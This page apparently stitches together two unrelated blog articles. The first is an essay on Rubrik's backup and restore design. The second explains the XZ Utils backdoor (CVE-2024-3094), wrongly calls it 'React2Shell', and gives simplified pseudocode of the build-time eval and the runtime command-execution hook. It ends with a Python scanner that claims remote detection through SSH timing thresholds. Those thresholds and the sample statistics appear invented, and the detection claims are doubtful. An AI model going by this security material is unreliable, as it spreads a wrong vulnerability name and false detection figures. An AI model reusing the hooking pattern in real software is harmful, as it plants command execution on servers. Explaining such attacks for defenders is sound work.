Why Rubrik’s Architecture Matters: When Restore, Not Backup, Is the Product

1. Backups Should Be Boring (and That Is the Point)

Backups are boring. They should be boring.
A backup system that generates excitement is usually signalling failure.

The only time backups become interesting is when they are missing, and that interest level is lethal. Emergency bridges. Frozen change windows. Executive escalation. Media briefings. Regulatory apology letters. Engineers being asked questions that have no safe answers.

Most backup platforms are built for the boring days. Rubrik is designed for the day boredom ends.

2. Backup Is Not the Product. Restore Is.

Many organisations still evaluate backup platforms on the wrong metric: how fast they can copy data somewhere else.

That metric is irrelevant during an incident.

When things go wrong, the only questions that matter are:

  • What can I restore?
  • How fast can it be used?
  • How many restores can run in parallel?
  • How little additional infrastructure is required?

Rubrik treats restore as the primary product, not a secondary feature.

3. Architectural Starting Point: Designed for Failure, Not Demos

Rubrik was built without tape era assumptions. There is no central backup server, no serial job controller, and no media server bottleneck. Instead, it uses a distributed, scale out architecture with a global metadata index and a stateless policy engine.

Restore becomes a metadata lookup problem, not a job replay problem. This distinction is invisible in demos and decisive during outages.

4. Performance Metrics That Actually Matter

Backup throughput is easy to optimise and easy to market. Restore performance is constrained by network fan out, restore concurrency, control plane orchestration, and application host contention.

Rubrik addresses this by default through parallel restore streams, linear scaling with node count, and minimal control plane chatter. Restore performance becomes predictable rather than optimistic.

5. Restore Semantics That Match Reality

The real test of any backup platform is not how elegantly it captures data, but how usefully it returns that data when needed. This is where architectural decisions made years earlier either pay dividends or extract penalties.

5.1 Instant Access Instead of Full Rehydration

Rubrik does not require full data copy back before access. It supports live mount of virtual machines, database mounts directly from backup storage, and file system mounts for selective recovery.

The recovery model becomes access first, copy later if needed. This is the difference between minutes and hours when production is down.

5.2 Dropping a Table Should Not Be a Crisis

Rubrik understands databases as structured systems, not opaque blobs.

It supports table level restores for SQL Server, mounting a database backup as a live database, extracting tables or schemas without restoring the full database, and point in time recovery without rollback.

Accidental table drops should be operational annoyances, not existential threats.

5.3 Supported Database Engines

Rubrik provides native protection for the major enterprise database platforms:

Database EngineLive MountPoint in Time RecoveryKey Constraints
Microsoft SQL ServerYesYes (transaction log replay)SQL 2012+ supported; Always On AG, FCI, standalone
Oracle DatabaseYesYes (archive log replay)RAC, Data Guard, Exadata supported; SPFILE required for automated recovery
SAP HANANoYesBackint API integration; uses native HANA backup scheduling
PostgreSQLNoYes (up to 5 minute RPO)File level incremental; on premises and cloud (AWS, Azure, GCP)
IBM Db2Via Elastic App ServiceYesUses native Db2 backup utilities
MongoDBVia Elastic App ServiceYesSharded and unsharded clusters; no quiescing required
MySQLVia Elastic App ServiceYesUses native MySQL backup tools
CassandraVia Elastic App ServiceYesVia Rubrik Datos IO integration

The distinction between native integration and Elastic App Service matters operationally. Native integration means Rubrik handles discovery, scheduling, and orchestration directly. Elastic App Service means Rubrik provides managed volumes as backup targets while the database’s native tools handle the actual backup process. Both approaches deliver immutability and policy driven retention, but the operational experience differs.

5.4 Live Mount: Constraints and Caveats

Live Mount is Rubrik’s signature capability—mounting backups as live, queryable databases without copying data back to production storage. The database runs with its data files served directly from the Rubrik cluster over NFS (for Oracle) or SMB 3.0 (for SQL Server).

This capability is transformative for specific use cases. It is not a replacement for production storage.

What Live Mount Delivers:

  • Near instant database availability (seconds to minutes, regardless of database size)
  • Zero storage provisioning on the target host
  • Multiple concurrent mounts from the same backup
  • Point in time access across the entire retention window
  • Ideal for granular recovery, DBCC health checks, test/dev cloning, audit queries, and upgrade validation

What Live Mount Does Not Deliver:

  • Production grade I/O performance
  • High availability during Rubrik cluster maintenance
  • Persistence across host or cluster reboots

IOPS Constraints:

Live Mount performance is bounded by the Rubrik appliance’s ability to serve I/O, not by the target host’s storage subsystem. Published figures suggest approximately 30,000 IOPS per Rubrik appliance for Live Mount workloads. This is adequate for reporting queries, data extraction, and validation testing. It is not adequate for transaction heavy production workloads.

The performance characteristics are inherently different from production storage:

MetricProduction SAN/FlashRubrik Live Mount
Random read IOPS100,000+~30,000 per appliance
Latency profileSub millisecondNetwork + NFS overhead
Write optimisationProduction tunedBackup optimised
Concurrent workloadsDesigned for contentionShared with backup operations

SQL Server Live Mount Specifics:

  • Databases mount via SMB 3.0 shares with UNC paths
  • Transaction log replay occurs during mount for point in time positioning
  • The mounted database is read write, but writes go to the Rubrik cluster
  • Supported for standalone instances, Failover Cluster Instances, and Always On Availability Groups
  • Table level recovery requires mounting the database, then using T SQL to extract and import specific objects

Oracle Live Mount Specifics:

  • Data files mount via NFS; redo logs and control files remain on the target host
  • Automated recovery requires source and target configurations to match (RAC to RAC, single instance to single instance, ASM to ASM)
  • Files only recovery allows dissimilar configurations but requires DBA managed RMAN recovery
  • SPFILE is required for automated recovery; PFILE databases require manual intervention
  • Block change tracking (BCT) is disabled on Live Mount targets
  • Live Mount fails if the target host, RAC cluster, or Rubrik cluster reboots during the mount—requiring forced unmount to clean up metadata
  • Direct NFS (DNFS) is recommended on Oracle RAC nodes for improved recovery performance

What Live Mount Is Not:

Live Mount is explicitly designed for temporary access, not sustained production workloads. The use cases Rubrik markets test/dev, DBCC validation, granular recovery, audit queries: all share a common characteristic: they are time bounded operations that tolerate moderate I/O performance in exchange for instant availability.

Running production transaction processing against a Live Mount database would be technically possible and operationally inadvisable. The I/O profile, the network dependency, and the lack of high availability guarantees make it unsuitable for workloads where performance and uptime matter.

5.5 The Recovery Hierarchy

Understanding when to use each recovery method matters:

Recovery NeedRecommended MethodTime to AccessStorage Required
Extract specific rows/tablesLive Mount + queryMinutesNone
Validate backup integrityLive Mount + DBCCMinutesNone
Clone for test/devLive MountMinutesNone
Full database replacementExport/RestoreHours (size dependent)Full database size
Disaster recovery cutoverInstant RecoveryMinutes (then migrate)Temporary, then full

The strategic value of Live Mount is avoiding full restores when full restores are unnecessary. For a 5TB database where someone dropped a single table, Live Mount means extracting that table in minutes rather than waiting hours for a complete restore.

For actual disaster recovery, where the production database is gone and must be replaced, Live Mount provides bridge access while the full restore completes in parallel. The database is queryable immediately; production grade performance follows once data migration finishes.

6. Why Logical Streaming Is a Design Failure

Traditional restore models stream backup data through the database host. This guarantees CPU contention, IO pressure, and restore times proportional to database size rather than change size.

Rubrik avoids this by mounting database images and extracting only required objects. The database host stops being collateral damage during recovery.

6.1 The VSS Tax: Why SQL Server Backups Cannot Escape Application Coordination

For VMware workloads without databases, Rubrik can leverage storage level snapshots that are instantaneous, application agnostic, and impose zero load on the guest operating system. The hypervisor freezes the VM state, the storage array captures the point in time image, and the backup completes before the application notices.

SQL Server cannot offer this simplicity. The reason is not a Microsoft limitation or a Rubrik constraint. The reason is transactional consistency.

The Crash Consistent Option Exists

Nothing technically prevents Rubrik, or any backup tool, from taking a pure storage snapshot of a SQL Server volume without application coordination. The snapshot would complete in milliseconds with zero database load.

The problem is what you would recover: a crash consistent image, not an application consistent one.

A crash consistent snapshot captures storage state mid flight. This includes partially written pages, uncommitted transactions, dirty buffers not yet flushed to disk, and potentially torn writes caught mid I/O. SQL Server is designed to recover from exactly this state. Every time the database engine starts after an unexpected shutdown, it runs crash recovery, rolling forward committed transactions from the log and rolling back uncommitted ones.

The database will become consistent. Eventually. Probably.

Why Probably Is Not Good Enough

Crash recovery works. It works reliably. It is tested millions of times daily across every SQL Server instance that experiences an unclean shutdown.

But restore confidence matters. When production is down and executives are asking questions, the difference between “this backup is guaranteed consistent” and “this backup should recover correctly after crash recovery completes” is operationally significant.

VSS exists to eliminate that uncertainty.

What VSS Actually Does

When a backup application requests an application consistent SQL Server snapshot, the following sequence executes:

  1. The backup application calls the VSS coordinator
  2. VSS notifies the SQL Server VSS Writer that a backup is imminent
  3. SQL Server flushes dirty pages from the buffer pool to disk
  4. SQL Server briefly freezes write I/O to guarantee a consistent capture point
  5. The storage snapshot executes
  6. SQL Server resumes normal operation
  7. VSS confirms completion to the backup application

The result is a snapshot that requires no crash recovery on restore. The database is immediately consistent, immediately usable, and carries no uncertainty about transactional integrity.

The Coordination Cost

The VSS freeze window is typically brief, milliseconds to low seconds. But the preparation is not free.

Buffer pool flushes on large databases generate I/O pressure. Checkpoint operations compete with production workloads. The freeze, however short, introduces latency for in flight transactions. The database instance is actively participating in its own backup.

For databases measured in terabytes, with buffer pools consuming hundreds of gigabytes, this coordination overhead becomes operationally visible. Backup windows that appear instantaneous from the storage console are hiding real work inside the SQL Server instance.

The Architectural Asymmetry

This creates a fundamental difference in backup elegance across workload types:

Workload TypeBackup MethodApplication LoadRestore State
VMware VM (no database)Storage snapshotZeroCrash consistent (acceptable)
VMware VM (with SQL Server)VSS coordinated snapshotModerateApplication consistent
Physical SQL ServerVSS coordinated snapshotModerate to highApplication consistent
Physical SQL ServerPure storage snapshotZeroCrash consistent (risky)

For a web server or file share, crash consistent is fine. The application has no transactional state worth protecting. For a database, crash consistent means trusting recovery logic rather than guaranteeing consistency.

The Uncomfortable Reality

The largest, most critical SQL Server databases, the ones that would benefit most from zero overhead instantaneous backup are precisely the workloads where crash consistent snapshots carry the most risk. More transactions in flight. Larger buffer pools. More recovery time if something needs replay.

Rubrik supports VSS coordination because the alternative is shipping backups that might need crash recovery. That uncertainty is acceptable for test environments. It is rarely acceptable for production databases backing financial systems, customer records, or regulatory reporting.

The VSS tax is not a limitation imposed by Microsoft or avoided by competitors. It is the cost of consistency. Every backup platform that claims application consistent SQL Server protection is paying it. The only question is whether they admit the overhead exists.

7. Snapshot Based Protection Is Objectively Better (When You Can Get It)

The previous section explained why SQL Server backups cannot escape application coordination. VSS exists because transactional consistency requires it, and the coordination overhead is the price of certainty.

This makes the contrast with pure snapshot based protection even starker. Where snapshots work cleanly, they are not incrementally better. They are categorically superior.

What Pure Snapshots Deliver

Snapshot based backups in environments that support them provide:

  • Near instant capture: microseconds to milliseconds, regardless of dataset size
  • Zero application load: the workload never knows a backup occurred
  • Consistent recovery points: the storage layer guarantees point in time consistency
  • Predictable backup windows: duration is independent of data volume
  • No bandwidth consumption during capture: data movement happens later, asynchronously

A 50TB VMware datastore snapshots in the same time as a 50GB datastore. Backup windows become scheduling decisions rather than capacity constraints.

Rubrik exploits this deeply in VMware environments. Snapshot orchestration, instant VM recovery, and live mounts all depend on the hypervisor providing clean, consistent, zero overhead capture points.

Why This Is Harder Than It Looks

The elegance of snapshot based protection depends entirely on the underlying platform providing the right primitives. This is where the gap between VMware and everything else becomes painful.

VMware offers:

  • Native snapshot APIs with transactional semantics
  • Changed Block Tracking (CBT) for efficient incrementals
  • Hypervisor level consistency without guest coordination
  • Storage integration through VADP (vSphere APIs for Data Protection)

These are not accidental features. VMware invested years building a backup ecosystem because they understood that enterprise adoption required operational maturity, not just compute virtualisation.

Physical hosts offer none of this.

There is no universal snapshot API for bare metal servers. Storage arrays provide snapshot capabilities, but each vendor implements them differently, with different consistency guarantees, different integration points, and different failure modes. The operating system has no standard mechanism to coordinate application state with storage level capture.

The Physical Host Penalty

This is why physical SQL Server hosts face a compounding disadvantage:

  1. No hypervisor abstraction: there is no layer between the OS and storage that can freeze state cleanly
  2. VSS remains mandatory: application consistency still requires database coordination
  3. No standardised incremental tracking: without CBT or equivalent, every backup must rediscover what changed
  4. Storage integration is bespoke: each array, each SAN, each configuration requires specific handling

The result is that physical hosts with the largest databases, the workloads generating the most backup data, with the longest restore times, under the most operational pressure, receive the least architectural benefit from modern backup platforms.

They are stuck paying the VSS tax without receiving the snapshot dividend.

The Integration Hierarchy

Backup elegance follows a clear hierarchy based on platform integration depth:

EnvironmentSnapshot QualityIncremental EfficiencyApplication ConsistencyOverall Experience
VMware (no database)ExcellentCBT drivenNot requiredSeamless
VMware (with SQL Server)ExcellentCBT drivenVSS coordinatedGood with overhead
Cloud native (EBS, managed disks)GoodProvider dependentVaries by workloadGenerally clean
Physical with enterprise SANPossibleArray dependentVSS coordinatedComplex but workable
Physical with commodity storageLimitedOften full scanVSS coordinatedPainful

The further down this hierarchy, the more the backup platform must compensate for missing primitives. Rubrik handles this better than most, but even excellent software cannot conjure APIs that do not exist.

Why the Industry Irony Persists

The uncomfortable truth is that snapshot based protection delivers its greatest value precisely where it is least available.

A 500GB VMware VM snapshots effortlessly. The hypervisor provides everything needed. Backup is boring, as it should be.

A 50TB physical SQL Server, the database actually keeping the business running, containing years of transactional history, backing regulatory reporting and financial reconciliation, must coordinate through VSS, flush terabytes of buffer pool, sustain I/O pressure during capture, and hope the storage layer cooperates.

The workloads that need snapshot elegance the most are architecturally prevented from receiving it.

This is not a Rubrik limitation. It is not a Microsoft conspiracy. It is the accumulated consequence of decades of infrastructure evolution where virtualisation received backup investment and physical infrastructure did not.

What This Means for Architecture Decisions

Understanding this hierarchy should influence infrastructure strategy:

Virtualise where possible. The backup benefits alone often justify the overhead. A SQL Server VM with VSS coordination still benefits from CBT, instant recovery, and hypervisor level orchestration.

Choose storage with snapshot maturity. If physical hosts are unavoidable, enterprise arrays with proven snapshot integration reduce the backup penalty. This is not the place for commodity storage experimentation.

Accept the VSS overhead. For SQL Server workloads, crash consistent snapshots are technically possible but operationally risky. The coordination cost is worth paying. Budget for it in backup windows and I/O capacity.

Plan restore, not backup. Snapshot speed is irrelevant if restore requires hours of data rehydration. The architectural advantage of snapshots extends to recovery only if the platform supports instant mount and selective restore.

Rubrik’s value in this landscape is not eliminating the integration gaps—nobody can—but navigating them intelligently. Where snapshots work, Rubrik exploits them fully. Where they do not, Rubrik minimises the penalty through parallel restore, live mounts, and metadata driven recovery.

The goal remains the same: make restore the product, regardless of how constrained the backup capture had to be.

8. Ransomware: Where Architecture Is Exposed

8.1 The Restore Storm Problem

After ransomware, the challenge is not backup availability. The challenge is restoring everything at once.

Constraints appear immediately. East-west traffic saturates. DWDM links run hot. Core switch buffers overflow. Cloud egress throttling kicks in.

Rubrik mitigates this through parallel restores, SLA based prioritisation, and live mounts for critical systems. What it cannot do is defeat physics. A good recovery plan avoids turning a data breach into a network outage.

9. SaaS vs Appliance: This Is a Network Decision

Functionally, Rubrik SaaS and on prem appliances share the same policy engine, metadata index, and restore semantics.

The difference is bandwidth reality.

On prem appliances provide fast local restores, predictable latency, and minimal WAN dependency. SaaS based protection provides excellent cloud workload coverage and operational simplicity, but restore speed is bounded by network capacity and egress costs.

Hybrid estates usually require both.

10. Why Rubrik in the Cloud?

Cloud providers offer native backup primitives. These are necessary but insufficient.

They do not provide unified policy across environments, cross account recovery at scale, ransomware intelligence, or consistent restore semantics.

Rubrik turns cloud backups into recoverable systems rather than isolated snapshots.

10.1 Should You Protect Your AWS Root and Crypto Accounts?

Yes, because losing the control plane is worse than losing data.

Rubrik protects IAM configuration, account state, and infrastructure metadata. After a compromise, restoring how the account was configured is as important as restoring the data itself.

11. Backup Meets Security (Finally)

Rubrik integrates threat awareness into recovery using entropy analysis, change rate anomaly detection, and snapshot divergence tracking.

This answers the most dangerous question in recovery: which backup is actually safe to restore?

Most platforms cannot answer this with confidence.

12. VMware First Class Citizen, Physical Hosts Still Lag

Rubrik’s deepest integrations exist in VMware environments, including snapshot orchestration, instant VM recovery, and live mounts.

The uncomfortable reality remains that physical hosts with the largest datasets would benefit most from snapshot based protection, yet receive the least integration. This is an industry gap, not just a tooling one.

13. When Rubrik Is Not the Right Tool

Rubrik is not universal.

It is less optimal when bandwidth is severely constrained, estates are very small, or tape workflows are legally mandated.

Rubrik’s value emerges at scale, under pressure, and during failure.

14. Conclusion: Boredom Is Success

Backups should be boring. Restores should be quiet. Executives should never know the platform exists.

The only time backups become exciting is when they fail, and that excitement is almost always lethal.

Rubrik is not interesting because it stores data. It is interesting because, when everything is already on fire, restore remains a controlled engineering exercise rather than a panic response.

References

  1. Gartner Magic Quadrant for Enterprise Backup and Recovery Solutions – https://www.gartner.com/en/documents/5138291
  2. Rubrik Technical Architecture Whitepapers – https://www.rubrik.com/resources
  3. Microsoft SQL Server Backup and Restore Internals – https://learn.microsoft.com/en-us/sql/relational-databases/backup-restore/backup-overview-sql-server
  4. VMware Snapshot and Backup Best Practices – https://knowledge.broadcom.com/external/article?legacyId=1025279
  5. AWS Backup and Recovery Documentation – https://docs.aws.amazon.com/aws-backup/
  6. NIST SP 800-209 Security Guidelines for Storage Infrastructure – https://csrc.nist.gov/publications/detail/sp/800-209/final
  7. Rubrik SQL Live Mount Documentation – https://www.rubrik.com/solutions/sql-live-mount
  8. Rubrik Oracle Live Mount Documentation – https://docs.rubrik.com/en-us/saas/oracle/oracle_live_mount.html
  9. Rubrik for Oracle and Microsoft SQL Server Data Sheet – https://www.rubrik.com/content/dam/rubrik/en/resources/data-sheet/Rubrik-for-Oracle-and-Microsoft-SQL-Sever-DS.pdf
  10. Rubrik Enhanced Performance for Microsoft SQL and Oracle Database – https://www.rubrik.com/blog/technology/2021/12/rubrik-enhanced-performance-for-microsoft-sql-and-oracle-database
  11. Rubrik PostgreSQL Support Announcement – https://www.rubrik.com/blog/technology/24/10/rubrik-expands-database-protection-with-postgre-sql-support-and-on-premises-sensitive-data-monitoring-for-microsoft-sql-server
  12. Rubrik Elastic App Service – https://www.rubrik.com/solutions/elastic-app-service
  13. Rubrik and VMware vSphere Reference Architecture – https://www.rubrik.com/content/dam/rubrik/en/resources/white-paper/ra-rubrik-vmware-vsphere.pdf
  14. Protecting Microsoft SQL Server with Rubrik Technical White Paper – https://www.rubrik.com/content/dam/rubrik/en/resources/white-paper/rwp-protecting-microsoft-sql-server-with-rubrik.pdf
  15. The Definitive Guide to Rubrik Cloud Data Management – https://www.rubrik.com/content/dam/rubrik/en/resources/white-paper/rwp-definitive-guide-to-rubrik-cdm.pdf
  16. Rubrik Oracle Tools GitHub Repository – https://github.com/rubrikinc/rubrik_oracle_tools
  17. Automating SQL Server Live Mounts with Rubrik – https://virtuallysober.com/2017/08/08/automating-sql-server-live-mounts-with-rubrik-alta-4-0/
0
0

Understanding and Detecting CVE-2024-3094: The React2Shell SSH Backdoor

Executive Summary

CVE-2024-3094 represents one of the most sophisticated supply chain attacks in recent history. Discovered in March 2024, this vulnerability embedded a backdoor into XZ Utils versions 5.6.0 and 5.6.1, allowing attackers to compromise SSH authentication on Linux systems. With a CVSS score of 10.0 (Critical), this attack demonstrates the extreme risks inherent in open source supply chains and the sophistication of modern cyber threats.

This article provides a technical deep dive into how the backdoor works, why it’s extraordinarily dangerous, and practical methods for detecting compromised systems remotely.

Table of Contents

  1. What Makes This Vulnerability Exceptionally Dangerous
  2. The Anatomy of the Attack
  3. Technical Implementation of the Backdoor
  4. Detection Methodology
  5. Remote Scanning Tools and Techniques
  6. Remediation Steps
  7. Lessons for the Security Community

What Makes This Vulnerability Exceptionally Dangerous

Supply Chain Compromise at Scale

Unlike traditional vulnerabilities discovered through code audits or penetration testing, CVE-2024-3094 was intentionally inserted through a sophisticated social engineering campaign. The attacker, operating under the pseudonym “Jia Tan,” spent over two years building credibility in the XZ Utils open source community before introducing the malicious code.

This attack vector is particularly insidious for several reasons:

Trust Exploitation: Open source projects rely on volunteer maintainers who operate under enormous time pressure. By becoming a trusted contributor over years, the attacker bypassed the natural skepticism that would greet code from unknown sources.

Delayed Detection: The malicious code was introduced gradually through multiple commits, making it difficult to identify the exact point of compromise. The backdoor was cleverly hidden in test files and binary blobs that would escape cursory code review.

Widespread Distribution: XZ Utils is a fundamental compression utility used across virtually all Linux distributions. The compromised versions were integrated into Debian, Ubuntu, Fedora, and Arch Linux testing and unstable repositories, affecting potentially millions of systems.

The Perfect Backdoor

What makes this backdoor particularly dangerous is its technical sophistication:

Pre-authentication Execution: The backdoor activates before SSH authentication completes, meaning attackers can gain access without valid credentials.

Remote Code Execution: Once triggered, the backdoor allows arbitrary command execution with the privileges of the SSH daemon, typically running as root.

Stealth Operation: The backdoor modifies the SSH authentication process in memory, leaving minimal forensic evidence. Traditional log analysis would show normal SSH connections, even when the backdoor was being exploited.

Selective Targeting: The backdoor contains logic to respond only to specially crafted SSH certificates, making it difficult for researchers to trigger and analyze the malicious behavior.

Timeline and Near Miss

The timeline of this attack demonstrates how close the security community came to widespread compromise:

Late 2021: “Jia Tan” begins contributing to XZ Utils project

2022-2023: Builds trust through legitimate contributions and pressures maintainer Lasse Collin

February 2024: Backdoored versions 5.6.0 and 5.6.1 released

March 29, 2024: Andres Freund, a PostgreSQL developer, notices unusual SSH behavior during performance testing and discovers the backdoor

March 30, 2024: Public disclosure and emergency response

Had Freund not noticed the 500ms SSH delay during unrelated performance testing, this backdoor could have reached production systems across the internet. The discovery was, by the discoverer’s own admission, largely fortuitous.

The Anatomy of the Attack

Multi-Stage Social Engineering

The attack began long before any malicious code was written. The attacker needed to:

  1. Establish Identity: Create a credible online persona with consistent activity patterns
  2. Build Reputation: Make legitimate contributions to build trust
  3. Apply Pressure: Create artificial urgency around maintainer succession
  4. Gain Commit Access: Become a co-maintainer with direct repository access

This process took approximately two years, demonstrating extraordinary patience and planning. The attacker created multiple personas to add social pressure on the sole maintainer, suggesting burnout and need for help.

Code Insertion Strategy

The malicious code was inserted through several mechanisms:

Obfuscated Build Scripts: The backdoor was triggered through the build system rather than in the main source code. Modified build scripts would inject malicious code during compilation.

Binary Test Files: Large binary test files were added to the repository, containing encoded malicious payloads. These files appeared to be legitimate test data but actually contained the backdoor implementation.

Multi-Commit Obfuscation: The backdoor was introduced across multiple commits over several weeks, making it difficult to identify a single “smoking gun” commit.

Ifunc Abuse: The backdoor used GNU indirect function (ifunc) resolvers to hook into the SSH authentication process at runtime, modifying program behavior without changing the obvious code paths.

Technical Implementation of the Backdoor

How XZ Utils Connects to SSH

To understand the backdoor, we must first understand an unexpected dependency chain:

SSH Connection → sshd (SSH daemon) → systemd notification → libsystemd → liblzma → XZ Utils

On many modern Linux distributions, the SSH daemon links against libsystemd for process notification and logging. The systemd library, in turn, links against liblzma for compression functionality. This creates an indirect but critical dependency: SSH loads XZ Utils’ compression library into its address space.

The attackers exploited this dependency chain to inject their backdoor into the SSH authentication process.

Stage 1: Build Time Injection

The attack begins during the XZ Utils build process:

# Simplified representation of the malicious build script
if test -f "$srcdir/tests/files/good-large_compressed.lzma"; then
    # Extract and execute embedded script from "test file"
    eval $(xz -dc "$srcdir/tests/files/good-large_compressed.lzma" | head -c 1024)
fi

The build script would:

  1. Detect specific binary test files in the source tree
  2. Decompress these files to extract shell commands
  3. Execute the extracted commands during the build process
  4. Modify the liblzma source code to include backdoor hooks

These binary test files appeared legitimate because they were valid LZMA compressed data. However, they contained carefully crafted payloads that would only activate under specific conditions.

Stage 2: Runtime Hooking

Once compiled with the malicious modifications, liblzma contains an ifunc resolver that executes early during library loading:

// Simplified representation of the hooking mechanism
void __attribute__((ifunc("resolve_function"))) 
hooked_function(void);

void* resolve_function(void) {
    // Check if we're loaded by sshd
    if (check_ssh_context()) {
        // Install hooks into RSA authentication
        hook_rsa_public_decrypt();
        return (void*)backdoor_implementation;
    }
    return (void*)legitimate_implementation;
}

The ifunc resolver runs before main() executes, allowing the backdoor to:

  1. Detect if it’s loaded by sshd (vs other programs using liblzma)
  2. Locate RSA authentication functions in memory
  3. Hook the RSA public key verification function
  4. Replace it with the backdoor implementation

Stage 3: Authentication Bypass

When an SSH connection arrives, the hooked RSA verification function:

// Conceptual representation of the backdoor logic
int backdoor_rsa_verify(unsigned char *signature, RSA *key) {
    // Check if signature contains magic bytes
    if (signature_contains_trigger(signature)) {
        // Extract and execute payload from certificate
        char *command = decode_payload(signature);

        // Execute with sshd privileges (typically root)
        system(command);

        // Return success to bypass authentication
        return 1;
    }

    // Otherwise, perform normal verification
    return original_rsa_verify(signature, key);
}

The backdoor:

  1. Intercepts all SSH authentication attempts
  2. Examines the RSA signature for special markers
  3. If triggered, extracts commands from the certificate
  4. Executes commands with root privileges
  5. Returns success to complete the “authentication”

From the SSH server’s perspective, this appears as a normal successful authentication. The logs would show a legitimate connection from an authorized user, even though no valid credentials were presented.

Why Traditional Detection Fails

The backdoor was designed to evade common security measures:

No Network Signatures: The malicious traffic looks identical to normal SSH, using standard protocols and ports.

No File System Artifacts: The backdoor exists only in memory after library loading. No malicious files are written to disk during exploitation.

Clean Source Code: The primary liblzma source code remains clean. The modifications occur during build time and aren’t present in the repository’s main files.

Log Evasion: Successful backdoor authentication appears in logs as a normal SSH connection, complete with username and source IP.

Selective Activation: The backdoor only responds to specially crafted certificates, making it difficult to trigger during security research or scanning.

Detection Methodology

Since the backdoor operates at runtime and leaves minimal artifacts, detection focuses on behavioral analysis rather than signature matching.

Timing Based Detection

The most reliable detection method exploits an unintended side effect: the backdoor’s cryptographic operations introduce measurable timing delays.

Normal SSH Handshake Timing:

1. TCP Connection: 10-50ms
2. SSH Banner Exchange: 20-100ms
3. Key Exchange Init: 50-150ms
4. Authentication Ready: 150-300ms total

Compromised SSH Timing:

1. TCP Connection: 10-50ms
2. SSH Banner Exchange: 50-200ms (slower due to ifunc hooks)
3. Key Exchange Init: 200-500ms (backdoor initialization overhead)
4. Authentication Ready: 500-1500ms total (cryptographic hooking delays)

The backdoor adds overhead in several places:

  1. Library Loading: The ifunc resolver runs additional code during liblzma initialization
  2. Memory Scanning: The backdoor searches process memory for authentication functions to hook
  3. Hook Installation: Modifying function pointers and setting up trampolines takes time
  4. Certificate Inspection: Every authentication attempt is examined for trigger signatures

These delays are consistent and measurable, even without triggering the actual backdoor functionality.

Detection Through Multiple Samples

A single timing measurement might be affected by network latency, server load, or other factors. However, the backdoor creates a consistent pattern:

Statistical Analysis:

Normal SSH server (10 samples):
- Mean: 180ms
- Std Dev: 25ms
- Variance: 625ms²

Backdoored SSH server (10 samples):
- Mean: 850ms
- Std Dev: 180ms
- Variance: 32,400ms²

The backdoored server shows both higher average timing and greater variance, as the backdoor’s overhead varies depending on system state and what initialization code paths execute.

Banner Analysis

While not definitive, certain configurations increase vulnerability likelihood:

High Risk Indicators:

  • Debian or Ubuntu distribution
  • OpenSSH version 9.6 or 9.7
  • Recent system updates in February-March 2024
  • systemd based initialization
  • SSH daemon with systemd notification enabled

Configuration Detection:

# SSH banner typically reveals:
SSH-2.0-OpenSSH_9.6p1 Debian-5ubuntu1

# Breaking down the information:
# OpenSSH_9.6p1 - Version commonly affected
# Debian-5ubuntu1 - Distribution and package version

Debian and Ubuntu were the primary targets because:

  1. They quickly incorporated the backdoored versions into testing repositories
  2. They use systemd, creating the sshd → libsystemd → liblzma dependency chain
  3. They enable systemd notification in sshd by default

Library Linkage Analysis

On accessible systems, verifying SSH’s library dependencies provides definitive evidence:

ldd /usr/sbin/sshd | grep liblzma
# Output on vulnerable system:
# liblzma.so.5 => /lib/x86_64-linux-gnu/liblzma.so.5

readlink -f /lib/x86_64-linux-gnu/liblzma.so.5
# /lib/x86_64-linux-gnu/liblzma.so.5.6.0
#                                    ^^^^ Vulnerable version

However, this requires authenticated access to the target system. For remote scanning, timing analysis remains the primary detection method.

Remote Scanning Tools and Techniques

Python Based Remote Scanner

The Python scanner performs comprehensive timing analysis without requiring authentication:

Core Detection Algorithm:

cat > ssh_backdoor_scanner.py << 'EOF'
#!/usr/bin/env python3

"""
React2Shell Remote SSH Scanner
CVE-2024-3094 Remote Detection Tool
"""

import socket
import time
import sys
import argparse
import statistics
from datetime import datetime

class Colors:
    RED = '\033[0;31m'
    GREEN = '\033[0;32m'
    YELLOW = '\033[1;33m'
    BLUE = '\033[0;34m'
    BOLD = '\033[1m'
    NC = '\033[0m'

class SSHBackdoorScanner:
    def __init__(self, timeout=10):
        self.timeout = timeout
        self.results = {}
        self.suspicious_indicators = 0
        
        # Timing thresholds (in seconds)
        self.HANDSHAKE_NORMAL = 0.2
        self.HANDSHAKE_SUSPICIOUS = 0.5
        self.AUTH_NORMAL = 0.3
        self.AUTH_SUSPICIOUS = 0.8
    
    def test_handshake_timing(self, host, port):
        """Test SSH handshake timing"""
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(self.timeout)
            
            start_time = time.time()
            sock.connect((host, port))
            
            banner = b""
            while b"\n" not in banner:
                chunk = sock.recv(1024)
                if not chunk:
                    break
                banner += chunk
            
            handshake_time = time.time() - start_time
            sock.close()
            
            self.results['handshake_time'] = handshake_time
            
            if handshake_time > self.HANDSHAKE_SUSPICIOUS:
                self.suspicious_indicators += 1
                return False
            return True
        except Exception as e:
            print(f"Error: {e}")
            return None
    
    def test_auth_timing(self, host, port):
        """Test authentication timing probe"""
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(self.timeout)
            sock.connect((host, port))
            
            # Read banner
            banner = b""
            while b"\n" not in banner:
                chunk = sock.recv(1024)
                if not chunk:
                    break
                banner += chunk
            
            # Send client version
            sock.send(b"SSH-2.0-OpenSSH_9.0_Scanner\r\n")
            
            # Measure response time
            start_time = time.time()
            sock.recv(8192)
            auth_time = time.time() - start_time
            
            sock.close()
            
            self.results['auth_time'] = auth_time
            
            if auth_time > self.AUTH_SUSPICIOUS:
                self.suspicious_indicators += 2
                return False
            return True
        except Exception as e:
            return None
    
    def scan(self, host, port=22):
        """Run complete vulnerability scan"""
        print(f"\n[*] Scanning {host}:{port}\n")
        
        self.test_handshake_timing(host, port)
        self.test_auth_timing(host, port)
        
        # Generate report
        if self.suspicious_indicators >= 3:
            print(f"Status: LIKELY VULNERABLE")
            print(f"Indicators: {self.suspicious_indicators}")
        elif self.suspicious_indicators >= 1:
            print(f"Status: SUSPICIOUS")
            print(f"Indicators: {self.suspicious_indicators}")
        else:
            print(f"Status: NOT VULNERABLE")

def main():
    parser = argparse.ArgumentParser(description='React2Shell Remote Scanner')
    parser.add_argument('host', help='Target hostname or IP')
    parser.add_argument('-p', '--port', type=int, default=22, help='SSH port')
    parser.add_argument('-t', '--timeout', type=int, default=10, help='Timeout')
    args = parser.parse_args()
    
    scanner = SSHBackdoorScanner(timeout=args.timeout)
    scanner.scan(args.host, args.port)

if __name__ == '__main__':
    main()
EOF

chmod +x ssh_backdoor_scanner.py

